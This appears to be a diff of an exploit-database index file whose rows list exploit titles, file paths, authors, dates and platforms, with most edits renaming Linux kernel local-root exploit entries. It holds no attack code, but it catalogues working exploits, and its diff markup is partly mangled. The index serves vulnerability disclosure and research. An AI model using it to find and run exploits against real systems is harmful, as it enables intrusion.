9540,platforms/windows/local/9540.py,"HTML Creator & Sender <= 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0
|
||||
9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow Exploit (Windows 2000)",2009-08-31,kingcope,windows,remote,21
|
||||
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit",2009-08-31,"INetCop Security",linux,local,0
|
||||
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit",2009-08-31,"Jon Oberheide",linux,local,0
|
||||
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
|
||||
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0
|
||||
9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability",2009-08-31,Red-D3v1L,php,webapps,0
|
||||
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0
|
||||
9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0
|
||||
|
@ -9034,8 +9034,8 @@ id,file,description,date,author,platform,type,port
|
|||
9571,platforms/php/webapps/9571.txt,"Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability",2009-09-01,v3n0m,php,webapps,0
|
||||
9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability",2009-09-01,Kurd-Team,php,webapps,0
|
||||
9573,platforms/windows/dos/9573.pl,"dTunes 2.72 (Filename Processing) Local Format String PoC",2009-09-01,TheLeader,windows,dos,0
|
||||
9574,platforms/linux/local/9574.txt,"Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit",2009-09-02,spender,linux,local,0
|
||||
9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 (Debian 4) - udp_sendmsg Local Root Exploit",2009-09-02,Andi,linux,local,0
|
||||
9574,platforms/linux/local/9574.txt,"Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit (2)",2009-09-02,spender,linux,local,0
|
||||
9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Root Exploit (3)",2009-09-02,Andi,linux,local,0
|
||||
9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection Vulnerability",2009-09-02,ZhaoHuAn,php,webapps,0
|
||||
9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 (highlighter) Remote File Inclusion Vulnerability",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0
|
||||
9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability",2009-09-02,v3n0m,php,webapps,0
|
||||
|
@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port
|
|||
9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0
|
||||
9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389
|
||||
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0
|
||||
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - sock_sendpage() Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0
|
||||
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4)",2009-09-09,"Ramon Valle",linux,local,0
|
||||
9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0
|
||||
9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 - (fonctions_racine.php) Remote File Inclusion Vulnerability",2009-09-09,"EA Ngel",php,webapps,0
|
||||
9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0
|
||||
|
@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port
|
|||
9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0
|
||||
9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0
|
||||
9640,platforms/php/webapps/9640.txt,"gyro 5.0 (SQL/XSS) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0
|
||||
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0
|
||||
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5)",2009-09-11,"Ramon Valle",linux,local,0
|
||||
9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812
|
||||
9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal Vulnerability",2009-09-11,"Usman Saeed",windows,remote,0
|
||||
9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80
|
||||
|
@ -9232,7 +9232,7 @@ id,file,description,date,author,platform,type,port
|
|||
9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
|
||||
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
|
||||
9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0
|
||||
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
|
||||
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
|
||||
9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0
|
||||
9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
|
||||
9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
|
||||
|
@ -9386,7 +9386,7 @@ id,file,description,date,author,platform,type,port
|
|||
10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 - 4.2-beta1 - Multiple XSS",2009-10-02,CoreLabs,jsp,webapps,0
|
||||
10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0
|
||||
10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0
|
||||
10018,platforms/linux/local/10018.sh,"Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0
|
||||
10018,platforms/linux/local/10018.sh,"Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability (4)",2009-11-12,"Earl Chew",linux,local,0
|
||||
10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
|
||||
10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
|
||||
10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
|
||||
|
@ -13628,7 +13628,7 @@ id,file,description,date,author,platform,type,port
|
|||
15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0
|
||||
15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0
|
||||
15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80
|
||||
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full Nelson' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
|
||||
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
|
||||
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
|
||||
15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0
|
||||
15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0
|
||||
|
@ -14065,7 +14065,7 @@ id,file,description,date,author,platform,type,port
|
|||
16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0
|
||||
16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension 'exif_read_data()' Function Remote DoS",2011-02-28,"_ikki and paradoxengine",multiple,dos,0
|
||||
16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation Vulnerability PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0
|
||||
16263,platforms/linux/dos/16263.c,"Linux Kernel <= 2.6.37 - Local Kernel Denial of Service",2011-03-02,prdelka,linux,dos,0
|
||||
16263,platforms/linux/dos/16263.c,"Linux Kernel <= 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0
|
||||
16265,platforms/php/webapps/16265.txt,"Readmore Systems Script SQL Injection Vulnerability",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0
|
||||
16266,platforms/php/webapps/16266.txt,"Quicktech SQL Injection Vulnerability",2011-03-02,eXeSoul,php,webapps,0
|
||||
16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
|
||||
|
@ -14745,7 +14745,7 @@ id,file,description,date,author,platform,type,port
|
|||
16949,platforms/php/webapps/16949.php,"maian weblog <= 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0
|
||||
16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",php,webapps,0
|
||||
16951,platforms/bsd/local/16951.c,"FreeBSD <= 6.4 - Netgraph Local Privledge Escalation Exploit",2011-03-10,zx2c4,bsd,local,0
|
||||
16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS",2011-03-10,zx2c4,linux,dos,0
|
||||
16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS (2)",2011-03-10,zx2c4,linux,dos,0
|
||||
16953,platforms/asp/webapps/16953.txt,"Luch Web Designer Multiple SQL Injection Vulnerabilities",2011-03-10,p0pc0rn,asp,webapps,0
|
||||
16954,platforms/php/webapps/16954.txt,"Keynect Ecommerce SQL Injection Vulnerability",2011-03-10,"Arturo Zamora",php,webapps,0
|
||||
16955,platforms/asp/webapps/16955.txt,"smartermail 7.3 & 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0
|
||||
|
@ -15436,7 +15436,7 @@ id,file,description,date,author,platform,type,port
|
|||
17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0
|
||||
17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0
|
||||
17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0
|
||||
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0
|
||||
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0
|
||||
17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,metasploit,windows,local,0
|
||||
17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection Vulnerability",2011-09-04,"Miroslav Stampar",php,webapps,0
|
||||
17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0
|
||||
|
@ -15950,7 +15950,7 @@ id,file,description,date,author,platform,type,port
|
|||
18404,platforms/php/webapps/18404.pl,"iSupport 1.x - CSRF HTML Code Injection to Add Admin",2012-01-21,Or4nG.M4N,php,webapps,0
|
||||
18399,platforms/windows/dos/18399.py,"VLC 1.2.0 (libtaglib_pluggin.dll) DoS",2012-01-20,"Mitchell Adair",windows,dos,0
|
||||
18405,platforms/asp/webapps/18405.txt,"ARYADAD - Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0
|
||||
18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - Mempodipper Local Root (1)",2012-01-23,zx2c4,linux,local,0
|
||||
18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Local Root (1)",2012-01-23,zx2c4,linux,local,0
|
||||
18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0
|
||||
18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0
|
||||
18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - (.aiff) Denial of Service Vulnerability",2012-04-04,condis,windows,dos,0
|
||||
|
@ -16514,7 +16514,7 @@ id,file,description,date,author,platform,type,port
|
|||
19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability",1999-01-02,"Tomas Halgas",windows,remote,23
|
||||
19386,platforms/php/webapps/19386.txt,"UCCASS <= 1.8.1 - Blind SQL Injection Vulnerability",2012-06-24,dun,php,webapps,0
|
||||
19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 DJVU Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0
|
||||
19117,platforms/linux/dos/19117.c,"Linux Kernel 2.0/2.1_ Digital UNIX <= 4.0 D_ FreeBSD <= 2.2.4_ HP HP-UX 10.20/11.0_ IBM AIX <= 3.2.5_ NetBSD 1.2_ Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability",1998-01-05,"T. Freak",linux,dos,0
|
||||
19117,platforms/linux/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX <= 4.0 D / FreeBSD <= 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX <= 3.2.5 / NetBSD 1.2 / Solaris <= 2.5.1) - Smurf Denial of Service Vulnerability",1998-01-05,"T. Freak",linux,dos,0
|
||||
19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0_Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability",1998-01-01,"Paul Ashton",multiple,remote,0
|
||||
19119,platforms/linux/remote/19119.c,"HP HP-UX <= 10.34 rlpdaemon Vulnerability",1998-07-06,"RSI Advise",linux,remote,0
|
||||
19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query Vulnerability",1998-07-06,"Luz Pinto",multiple,remote,0
|
||||
|
@ -16787,7 +16787,7 @@ id,file,description,date,author,platform,type,port
|
|||
19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1_HP HP-UX <= 11.0_Solaris <= 7.0_SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0
|
||||
19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1_HP HP-UX <= 11.0_Solaris <= 7.0_SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (2)",1999-07-13,jGgM,multiple,remote,0
|
||||
19422,platforms/linux/local/19422.txt,"BMC Software Patrol <= 3.2.5 Patrol SNMP Agent File Creation/Permission Vulnerability",1999-07-14,"Andrew Alness",linux,local,0
|
||||
19423,platforms/multiple/dos/19423.c,"Linux Kernel <= 2.3_ BSD/OS <= 4.0_ FreeBSD <= 3.2_ NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability",1999-07-15,"Mike Perry",multiple,dos,0
|
||||
19423,platforms/multiple/dos/19423.c,"Linux Kernel <= 2.3 (BSD/OS <= 4.0 / FreeBSD <= 3.2 / NetBSD <= 1.4) - Shared Memory Denial of Service Vulnerability",1999-07-15,"Mike Perry",multiple,dos,0
|
||||
19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1)",1999-07-19,"rain forest puppy",windows,remote,0
|
||||
19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0
|
||||
19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0_SGI IRIX <= 6.5.4_SGI UNICOS <= 10.0 6 arrayd.auth Default Configuration Vulnerability",1999-07-19,"Last Stage of Delirium",multiple,remote,0
|
||||
|
@ -17174,7 +17174,7 @@ id,file,description,date,author,platform,type,port
|
|||
19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal Vulnerability",2000-03-21,"Johan Nilsson",windows,remote,0
|
||||
19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19_ Debian 2.x_ RedHat 6.x_ S.u.S.E 5.3/6.x gpm Setgid Vulnerability",2000-03-22,"Egmont Koblinger",linux,local,0
|
||||
19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0
|
||||
19818,platforms/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99_ RedHat 6.x - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0
|
||||
19818,platforms/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0
|
||||
19819,platforms/windows/remote/19819.txt,"GeoCel WindMail 3.0 - Remote File Read Vulnerability",2000-03-27,"Quan Peng",windows,remote,0
|
||||
19820,platforms/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - DoS Vulnerability",2000-03-25,"Presto Chango",windows,dos,0
|
||||
19821,platforms/multiple/local/19821.c,"Citrix MetaFrame 1.0/1.8 - Weak Encryption Vulnerability",2000-03-29,"Dug Song",multiple,local,0
|
||||
|
@ -17345,8 +17345,8 @@ id,file,description,date,author,platform,type,port
|
|||
19997,platforms/windows/remote/19997.java,"Etype Eserv 2.9.2 Logging Buffer Overflow Vulnerability",2000-05-10,Wizdumb,windows,remote,0
|
||||
19998,platforms/linux/remote/19998.c,"ISC innd 2.x - Remote Buffer Overflow Vulnerability",2000-06-12,"Michal Zalewski",linux,remote,0
|
||||
19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 BRUEXECLOG Environment Variable Vulnerability",2000-06-05,"Riley Hassell",multiple,local,0
|
||||
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail) Vulnerability (1)",2000-06-07,"Florian Heinz",linux,local,0
|
||||
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
|
||||
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root 'sendmail' Vulnerability (1)",2000-06-07,"Florian Heinz",linux,local,0
|
||||
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
|
||||
20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0
|
||||
20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0
|
||||
20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 restore Buffer Overflow Vulnerability",2000-06-07,"Stan Bubrouski",linux,local,0
|
||||
|
@ -21711,7 +21711,7 @@ id,file,description,date,author,platform,type,port
|
|||
24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0
|
||||
24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability",2013-02-27,EgiX,php,webapps,0
|
||||
24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0
|
||||
24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
|
||||
24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Local Root (1)",2013-02-27,sd,linux,local,0
|
||||
24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - (.m3u) Buffer Overflow Vulnerability",2013-03-01,metacom,windows,dos,0
|
||||
24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0
|
||||
24560,platforms/php/webapps/24560.txt,"doorGets CMS - CSRF Vulnerability",2013-03-01,n0pe,php,webapps,0
|
||||
|
@ -21900,7 +21900,7 @@ id,file,description,date,author,platform,type,port
|
|||
24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow Vulnerability",2013-03-13,coolkaveh,windows,dos,0
|
||||
24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 - 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0
|
||||
24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,metasploit,windows,remote,0
|
||||
24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - sock_diag_handlers Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
|
||||
24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Root Exploit (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
|
||||
24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
|
||||
24748,platforms/php/webapps/24748.txt,"event calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0
|
||||
24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
|
||||
|
@ -22340,7 +22340,7 @@ id,file,description,date,author,platform,type,port
|
|||
25199,platforms/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting Vulnerability",2005-03-08,trueend5,php,webapps,0
|
||||
25200,platforms/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,php,webapps,0
|
||||
25201,platforms/cgi/webapps/25201.txt,"NewsScript Access Validation Vulnerability",2005-03-08,adrianc23@gmail.com,cgi,webapps,0
|
||||
25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (1)",2005-03-09,sd,linux,local,0
|
||||
25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Local Root Vulnerability (1)",2005-03-09,sd,linux,local,0
|
||||
25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.x (RHEL4 <= 2.6.9 / <= 2.6.11) - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (2)",2005-03-09,alert7,linux,local,0
|
||||
25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - (.lst) Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0
|
||||
25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String Vulnerability",2005-03-10,"Luigi Auriemma",multiple,remote,0
|
||||
|
@ -22579,7 +22579,7 @@ id,file,description,date,author,platform,type,port
|
|||
25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x? / 2.x / 3.x - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0
|
||||
25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id param) SQL Injection Vulnerability",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0
|
||||
25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow Vulnerability (SEH)",2013-05-14,ariarat,windows,dos,0
|
||||
25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 <= 3.x.x (CentOS) - PERF_EVENTS Local Root Exploit",2013-05-14,sd,linux,local,0
|
||||
25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 <= 3.x.x (CentOS) - 'PERF_EVENTS' Local Root Exploit (1)",2013-05-14,sd,linux,local,0
|
||||
25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000
|
||||
25446,platforms/multiple/remote/25446.rb,"SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000
|
||||
25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injection Vulnerabilities",2013-05-14,RunRunLevel,php,webapps,0
|
||||
|
@ -23272,7 +23272,7 @@ id,file,description,date,author,platform,type,port
|
|||
26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0
|
||||
